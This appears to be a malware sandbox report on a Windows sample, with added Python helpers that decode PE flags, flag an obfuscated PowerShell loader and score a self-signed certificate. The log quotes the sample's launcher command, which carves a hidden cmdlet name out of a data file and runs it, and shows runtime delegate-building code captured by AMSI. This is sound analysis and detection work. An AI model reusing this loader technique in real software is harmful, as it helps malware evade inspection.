Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ucrtbase_clr0400.dll (2 identical entries)
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\rAntephialtic.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\rAntephialtic.exe | File written: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\gdningsopbevaringerne.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: rAntephialtic.exe | Static file information: File size 1542704 > 1048576
Source: rAntephialtic.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
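The static PE entries above (invalid certificate; COFF characteristics RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE; DllCharacteristics DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE) come straight out of two header fields and one data-directory slot, and the combination deserves a second look: DYNAMIC_BASE asks for ASLR, but with relocations stripped the loader has nothing to rebase with. The Python below is an added example, not code from the Joe Sandbox report or from the sample: a standard-library parser that decodes both flag fields from raw bytes, reads the IMAGE_DIRECTORY_ENTRY_SECURITY slot to tell whether an Authenticode blob is attached, and writes the reviewer notes a triage analyst would want. Because the report does not ship the sample, the image it runs on is a constructed headers-only PE32 with the flag values the report lists; the timestamp is an assumed August 2020 value and the security-directory offset and size are invented.

```python
"""Decode the PE header flags this report lists and check for an Authenticode entry.

Added example; not from the Joe Sandbox report. Standard library only, so it runs
on any sample file's bytes or on the constructed image built at the bottom.
"""
import struct

# IMAGE_FILE_* bits of the COFF Characteristics field (winnt.h), ascending.
FILE_CHARACTERISTICS = [
    (0x0001, "RELOCS_STRIPPED"), (0x0002, "EXECUTABLE_IMAGE"),
    (0x0004, "LINE_NUMS_STRIPPED"), (0x0008, "LOCAL_SYMS_STRIPPED"),
    (0x0010, "AGGRESSIVE_WS_TRIM"), (0x0020, "LARGE_ADDRESS_AWARE"),
    (0x0080, "BYTES_REVERSED_LO"), (0x0100, "32BIT_MACHINE"),
    (0x0200, "DEBUG_STRIPPED"), (0x0400, "REMOVABLE_RUN_FROM_SWAP"),
    (0x0800, "NET_RUN_FROM_SWAP"), (0x1000, "SYSTEM"), (0x2000, "DLL"),
    (0x4000, "UP_SYSTEM_ONLY"), (0x8000, "BYTES_REVERSED_HI"),
]
# IMAGE_DLLCHARACTERISTICS_* bits of the optional header.
DLL_CHARACTERISTICS = [
    (0x0020, "HIGH_ENTROPY_VA"), (0x0040, "DYNAMIC_BASE"), (0x0080, "FORCE_INTEGRITY"),
    (0x0100, "NX_COMPAT"), (0x0200, "NO_ISOLATION"), (0x0400, "NO_SEH"),
    (0x0800, "NO_BIND"), (0x1000, "APPCONTAINER"), (0x2000, "WDM_DRIVER"),
    (0x4000, "GUARD_CF"), (0x8000, "TERMINAL_SERVER_AWARE"),
]
SECURITY_DIR_INDEX = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY


def _names(value: int, table) -> list:
    return [name for bit, name in table if value & bit]


def parse_pe_flags(data: bytes) -> dict:
    """Read COFF Characteristics, DllCharacteristics and the security data directory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, _nsect, timestamp, _, _, _opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    pe32plus = magic == 0x20B
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    nrva_off = opt + (108 if pe32plus else 92)               # NumberOfRvaAndSizes
    nrva = struct.unpack_from("<I", data, nrva_off)[0]
    sec_off = sec_size = 0
    if nrva > SECURITY_DIR_INDEX:
        # Directories follow NumberOfRvaAndSizes; for the security entry the first
        # field is a raw file offset, not an RVA, because the blob is never mapped.
        sec_off, sec_size = struct.unpack_from("<II", data, nrva_off + 4 + SECURITY_DIR_INDEX * 8)
    return {
        "machine": machine, "timestamp": timestamp, "pe32plus": pe32plus,
        "characteristics": _names(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": _names(dll_chars, DLL_CHARACTERISTICS),
        "has_authenticode": sec_off != 0 and sec_size != 0,
        "security_dir": (sec_off, sec_size),
    }


def pe_notes(info: dict) -> list:
    """Reviewer notes for the flag combinations that change what the mitigations mean."""
    notes = []
    c, d = set(info["characteristics"]), set(info["dll_characteristics"])
    if "DYNAMIC_BASE" in d and "RELOCS_STRIPPED" in c:
        notes.append("DYNAMIC_BASE set but relocations stripped: the loader cannot rebase "
                     "the image, so it maps at its preferred ImageBase and ASLR is not applied")
    if "NX_COMPAT" not in d:
        notes.append("NX_COMPAT clear: data pages may be executable")
    if info["has_authenticode"]:
        notes.append("Authenticode entry present at file offset 0x%x (%d bytes); "
                     "validity must be checked separately" % info["security_dir"])
    else:
        notes.append("no Authenticode signature")
    return notes


def build_constructed_pe(characteristics: int, dll_characteristics: int, signed: bool) -> bytes:
    """Minimal headers-only PE32 image (constructed; not the sample) for offline testing."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    # Machine i386, no sections, an assumed Aug-2020 timestamp, 224-byte optional header.
    coff = struct.pack("<HHIIIHH", 0x014C, 0, 0x5F2A6E10, 0, 0, 224, characteristics)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<H", opt, 68, 2)                           # SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    if signed:                                                   # invented offset/size
        struct.pack_into("<II", opt, 96 + SECURITY_DIR_INDEX * 8, 0x176000, 0x1830)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    image = build_constructed_pe(0x010F, 0x8540, signed=True)   # the report's flag values
    flags = parse_pe_flags(image)
    print(flags["characteristics"], flags["dll_characteristics"])
    for note in pe_notes(flags):
        print("-", note)
```

To run it on a real file, pass `open(path, "rb").read()` to `parse_pe_flags`; the security-directory size being non-zero only says a signature blob is attached, which is why the report's "invalid certificate" verdict still needs a separate verification step.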

          Data Obfuscation

Source: Yara match | File source: 00000003.00000002.1830778551.000000000CF10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tussocky $Neutraliser $Dalstrg), (Buddhi @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Knyazi = [AppDomain]::CurrentDomain.GetAssemblies()$global:Halmlud
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Socialiseredes)), $sarcophagal).DefineDynamicModule($Desertress, $false).DefineType($Illuminato, $Fyrskib, [System.MulticastDelegate])
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00F3EAF8 push eax; mov dword ptr [esp], edx (at 3_2_00F3EB0C)
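Two entries in this report are the most reusable detection hooks it offers. The first is the launcher command line under Process created in the System Summary: the script reads a .Tra file as one string with gc -Raw, carves three characters out of it at offset 54058, and calls them as a command with the whole file as the argument, so the cmdlet name never appears on the command line. The second is the pair of AMSI captures directly above, where a delegate type is defined at runtime (DefineDynamicAssembly, DefineDynamicModule, DefineType with System.MulticastDelegate) and bound to a raw function pointer with GetDelegateForFunctionPointer, which is P/Invoke without Add-Type or a compiled assembly. The Python below is an added triage helper, not code from the Joe Sandbox report or from the sample: it recognises and scores that command-line shape in process-creation telemetry, flags the reflective P/Invoke markers in captured script text, and shows how to recover the invoked cmdlet name once the .Tra file is available. The report does not include Kinestheses.Tra, so the payload here is constructed and the "iex" placed at offset 54058 is an assumption about loaders of this shape, not something the report establishes; the function names (loader_score, reflective_pinvoke_hits and the rest) are mine.

```python
"""Triage of the GuLoader-style PowerShell stage seen in this report.

Added example; not part of the Joe Sandbox report or of the sample.
"""
import re
from typing import Optional

# Command line exactly as the report's "Process created" entry records it.
REPORTED_CMDLINE = (
    '"powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw '
    "'C:\\Users\\user\\AppData\\Roaming\\svampestuvningernes\\Circumcising"
    "\\Subcommissionership\\Kinestheses.Tra';"
    '$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)"'
)

# Fragments from the report's AMSI capture: a delegate type is defined at runtime and
# bound to a raw function pointer, i.e. P/Invoke without Add-Type or a compiled assembly.
AMSI_CAPTURE = (
    "GetDelegateForFunctionPointer((Tussocky $Neutraliser $Dalstrg), (Buddhi @([IntPtr], "
    "[UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Knyazi = "
    "[AppDomain]::CurrentDomain.GetAssemblies()",
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Socialiseredes)), "
    "$sarcophagal).DefineDynamicModule($Desertress, $false).DefineType($Illuminato, "
    "$Fyrskib, [System.MulticastDelegate])",
)

# gc/cat/type/Get-Content -Raw '<path>'  ...  .SubString(<offset>,<len>)  ...  .$var($var)
_READ_RE = re.compile(r"(?:gc|cat|type|Get-Content)\s+-Raw\s+'([^']+)'", re.IGNORECASE)
_SUBSTR_RE = re.compile(r"\.SubString\((\d+)\s*,\s*(\d+)\)", re.IGNORECASE)
_DYNCALL_RE = re.compile(r"\.\$\w+\s*\(\s*\$\w+\s*\)")
_HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+(?:minimized|hidden)", re.IGNORECASE)

# Reflection calls that together amount to a hand-rolled P/Invoke; two or more in one
# script block are rare in administrative PowerShell.
REFLECTIVE_PINVOKE_MARKERS = (
    "GetDelegateForFunctionPointer",
    "DefineDynamicAssembly",
    "DefineDynamicModule",
    "System.MulticastDelegate",
    "CurrentDomain.GetAssemblies",
)


def parse_loader_cmdline(cmdline: str) -> Optional[dict]:
    """Return {path, offset, length} when all three loader parts are present, else None."""
    read, sub = _READ_RE.search(cmdline), _SUBSTR_RE.search(cmdline)
    if not (read and sub and _DYNCALL_RE.search(cmdline)):
        return None
    return {"path": read.group(1), "offset": int(sub.group(1)), "length": int(sub.group(2))}


def loader_score(cmdline: str) -> int:
    """Additive heuristic for process-creation telemetry; 3 or more merits an alert."""
    score = 0
    score += 1 if _HIDDEN_RE.search(cmdline) else 0     # window hidden or minimized
    score += 1 if _READ_RE.search(cmdline) else 0       # whole file read as one string
    score += 1 if _SUBSTR_RE.search(cmdline) else 0     # command name carved out of data
    score += 2 if _DYNCALL_RE.search(cmdline) else 0    # .$var(...) invokes that name
    return score


def reflective_pinvoke_hits(script_text: str) -> list:
    """Markers of runtime delegate/P-Invoke construction found in captured script text."""
    return [m for m in REFLECTIVE_PINVOKE_MARKERS if m in script_text]


def recover_invoked_command(payload: str, offset: int, length: int) -> str:
    """What the loader actually calls: payload[offset:offset + length]."""
    if offset + length > len(payload):
        raise ValueError("offset/length exceed payload; wrong file or truncated dump")
    return payload[offset:offset + length]


def constructed_payload(cmdlet: str = "iex", offset: int = 54058) -> str:
    """Stand-in for Kinestheses.Tra (not in the report): filler with the cmdlet name at offset."""
    return "A" * offset + cmdlet + "B" * 1024


if __name__ == "__main__":
    parsed = parse_loader_cmdline(REPORTED_CMDLINE)
    print("loader parts:", parsed, "score:", loader_score(REPORTED_CMDLINE))
    print("reflective P/Invoke markers:", reflective_pinvoke_hits("\n".join(AMSI_CAPTURE)))
    payload = constructed_payload()
    print("invoked command (constructed payload):",
          recover_invoked_command(payload, parsed["offset"], parsed["length"]))
```

On a live host the `path` returned by `parse_loader_cmdline` is the file to collect first; with the real file in hand, `recover_invoked_command` gives the cmdlet name and everything after the carved characters is the argument the loader hands to it.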

          Persistence and Installation Behavior

Source: Initial sample | Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system providers 2) Organization 'Inflex' is not a well-known company 3) Unusual email domain 'Subworkman.Aa' appears suspicious and non-corporate 4) Large time gap between compilation date (Aug 2020) and certificate creation (Sept 2024) suggests possible certificate manipulation 5) Unusual organizational unit name 'Eksamensprojekt Teatraliseredes' appears randomly generated or meaningless 6) While US/California location is generally lower risk, other factors strongly suggest this is being used as a false front 7) Certificate signature is explicitly marked as invalid by the system. The combination of a self-signed certificate, suspicious email domain, and invalid signature strongly suggests this is not a legitimate business certificate.
Source: C:\Users\user\Desktop\rAntephialtic.exe | File created: C:\Users\user\AppData\Local\Temp\nsd4D6C.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Illustrable\Adlende\rAntephialtic.exe
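The certificate checks in the Joe Sandbox AI entry above are mechanical enough to run outside the sandbox against any signed PE. The Python below is an added example, not the report's or the sandbox's code: it parses signer and issuer distinguished names in the "K=V, K=V" form that signtool and Get-AuthenticodeSignature print, then applies the same rules the entry lists (issuer equals subject; mail domain and OU inconsistent with the organization; a long gap between the PE compile timestamp and the certificate's notBefore; a signature that does not verify). The O, OU, mail domain and state/country values are the ones the report gives; the CN, the mail local part, the exact dates, the 365-day threshold and the function names are constructed. The entry's "unusual TLD" point is deliberately not encoded, because judging a TLD needs an external registry list.

```python
"""Signer-certificate triage implementing the checks the report's AI signature lists.

Added example; not from the Joe Sandbox report. Subject fields come from the report
where it states them (O=Inflex, the OU text, the Subworkman.Aa mail domain,
California/US); the CN, the mail local part and the exact dates are constructed.
"""
import re
from datetime import datetime, timezone


def parse_dn(dn: str) -> dict:
    """Parse an RFC 2253-style 'K=V, K=V' string (backslash-escaped commas allowed)."""
    fields = {}
    for part in re.split(r"(?<!\\),\s*", dn):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip().upper()] = value.replace("\\,", ",").strip()
    return fields


def _tokens(text: str) -> set:
    return set(re.findall(r"[a-z0-9]+", text.lower()))


def assess_signer(subject_dn: str, issuer_dn: str, not_before: datetime,
                  pe_compile_time: datetime, signature_valid: bool,
                  max_build_to_cert_days: int = 365) -> dict:
    """Score an Authenticode signer; two or more findings make the signature untrustworthy."""
    subject, issuer = parse_dn(subject_dn), parse_dn(issuer_dn)
    findings = []
    if subject == issuer:
        findings.append("self-signed: issuer equals subject, so no chain to a trusted root")
    org = subject.get("O", "")
    email = subject.get("E") or subject.get("EMAILADDRESS") or ""
    domain = email.rsplit("@", 1)[1].lower() if "@" in email else ""
    if org and domain and not (_tokens(org) & _tokens(domain)):
        findings.append("mail domain '%s' shares no token with organization '%s'" % (domain, org))
    ou = subject.get("OU", "")
    if org and ou and not (_tokens(org) & _tokens(ou)):
        findings.append("OU '%s' shares no token with organization '%s'" % (ou, org))
    gap_days = (not_before - pe_compile_time).days
    if gap_days > max_build_to_cert_days:
        findings.append("certificate issued %d days after the PE compile timestamp" % gap_days)
    if not signature_valid:
        findings.append("signature does not verify against the embedded certificate")
    verdict = "untrusted signer" if len(findings) >= 2 else "no strong indicator"
    return {"findings": findings, "verdict": verdict}


# Values from the report's AI signature; CN, mail local part and exact days are constructed.
SAMPLE_SUBJECT = ("E=mail@Subworkman.Aa, CN=Inflex, OU=Eksamensprojekt Teatraliseredes, "
                  "O=Inflex, S=California, C=US")
SAMPLE_ISSUER = SAMPLE_SUBJECT                                   # self-signed, as reported
SAMPLE_COMPILE = datetime(2020, 8, 15, tzinfo=timezone.utc)      # "Aug 2020"; day assumed
SAMPLE_NOT_BEFORE = datetime(2024, 9, 10, tzinfo=timezone.utc)   # "Sept 2024"; day assumed


def report_example() -> dict:
    """The report's signer, with the signature marked invalid as the report states."""
    return assess_signer(SAMPLE_SUBJECT, SAMPLE_ISSUER, SAMPLE_NOT_BEFORE, SAMPLE_COMPILE, False)


def benign_example() -> dict:
    """A normally issued certificate for contrast (all values constructed)."""
    return assess_signer(
        "CN=Contoso Ltd, O=Contoso Ltd, E=release@contoso.example, C=US",
        "CN=Some Public CA, O=Some Public CA, C=US",
        datetime(2024, 2, 1, tzinfo=timezone.utc),
        datetime(2024, 1, 10, tzinfo=timezone.utc),
        True)


if __name__ == "__main__":
    for label, result in (("report sample", report_example()), ("benign", benign_example())):
        print(label, "->", result["verdict"])
        for finding in result["findings"]:
            print("  -", finding)
```

The compile-to-certificate gap is the one rule that needs judgement: legitimately re-signed old builds exist, so treat it as corroboration rather than as a finding on its own, which is why the verdict needs two findings.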

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 600000
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599884
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599781
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599672
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599562
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599453
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599344
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599219
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599100
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599000
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598889
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598781
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598672
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598562
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598453
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598344
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598234
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598125
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598015
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597906
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597797
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597687
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597573
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597466
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597359
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597233
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597109
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596998
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596890
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596770
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596656
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596545
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596417
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596312
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596203
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596086
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595984
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595875
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595765
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595656
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595547
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595437
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595328
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595219
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595094
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594984
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594875
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594765
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594656
          Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594547
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6994
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2663
